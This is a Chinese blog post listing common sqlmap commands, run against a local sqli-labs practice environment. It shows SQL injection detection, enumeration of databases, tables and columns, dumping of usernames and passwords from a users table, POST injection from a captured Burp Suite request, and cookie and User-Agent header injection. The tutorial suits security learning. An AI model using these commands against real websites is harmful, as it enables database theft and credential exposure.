sqlmap一些常用命令

仅供交流学习使用,请勿用于非法用途

python 复制代码
1)检测url存在漏洞情况:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1"
2)获取所有数据库名称:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --dbs
3)获取指定库的所有表名:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --tables -D security
4)获取当前数据库名是什么:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --current-db
5)获取指定库指定表的所有字段:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --columns -D security -T users
6)!!!禁止使用!!!拖库:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" -C id,password,username  -D security -T users --dump

以上为本地测试,请勿用于非法用途

环境,phpstudy搭建的sqli-labs

补充:

python 复制代码
7)多参数时指定参数:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1&page=1" -p page
	或者:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1&page=1" -p page --batch
	其中 --batch 是自动化测试,需要选择,全部默认Y(注入过程可能比较久)
8)批量检测:python sqlmap.py -m C:\Users\Administrator\Desktop\url.txt
9)设置cookie(检测需要登录的url):python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --cookie "cookie内容" --dbs
10)随机使用一个User-agent头部,或者指定一个User-agent头部: 随机: --random-agent
	指定:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --user-agent="User-agent头部" --dbs

以上是get方式

以下是post方式

补充:

python 复制代码
post注入(其他内容获取都一样):python sqlmap.py -r C:\Users\Administrator\Desktop\2.txt -p uname --dbs

2.txt文件内容:

xml 复制代码
POST /sqli-labs-master/Less-11/ HTTP/1.1
Host: 192.168.88.128
User-Agent: 等等等
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://192.168.88.128
Connection: close
Referer: http://192.168.88.128/sqli-labs-master/Less-11/
Upgrade-Insecure-Requests: 1

uname=aaa&passwd=bbb&submit=Submit

此文件是burpsuite拦截的,至于怎么保存这个文件自己查询或者直接复制都是可以的

补充:

head头注入:可以是cookie或者User-Agent

python 复制代码
head头注入:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-20/" --cookie "uname=Dumb" --level 2 --dbs

--level:指定测试等级

相关推荐
假客套9 天前
【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦
网络安全·xss·web渗透·dvwa靶场·dvwa xss靶场
ccc_9wy22 天前
sql-labs靶场第十六关测试报告
数据库·sql·web安全·网络安全·sql注入·sqlmap·盲注
ccc_9wy1 个月前
sql-labs靶场第十五关测试报告
数据库·sql·web安全·网络安全·sql注入·sqlmap·布尔盲注
ccc_9wy1 个月前
sql-labs靶场第十四关测试报告
数据库·sql·web安全·网络安全·sql注入·sqlmap·报错注入
南暮思鸢1 个月前
CTFHUB技能树之SQL——Refer注入
数据库·经验分享·sql·sqlmap·burpsuite·ctfhub技能树·referer注入
南暮思鸢1 个月前
CTFHUB技能树之SQL——Cookie注入
数据库·sql·web安全·网络安全·sqlmap·ctfhub技能树·cookie注入
Pluto-20032 个月前
WEB渗透权限维持篇-隐藏windows服务
windows·网络安全·渗透测试·权限维持·web渗透
Pluto-20032 个月前
WEB渗透权限维持篇-禁用Windows事件日志
windows·web安全·网络安全·权限维持·web渗透
Pluto-20032 个月前
WEB渗透Linux提权篇-环境变量提权
linux·web安全·网络安全·渗透测试·提权·web渗透
凝聚力安全团队3 个月前
【漏洞复现】SuiteCRM responseEntryPoint Sql注入漏洞
数据库·sql·web·web渗透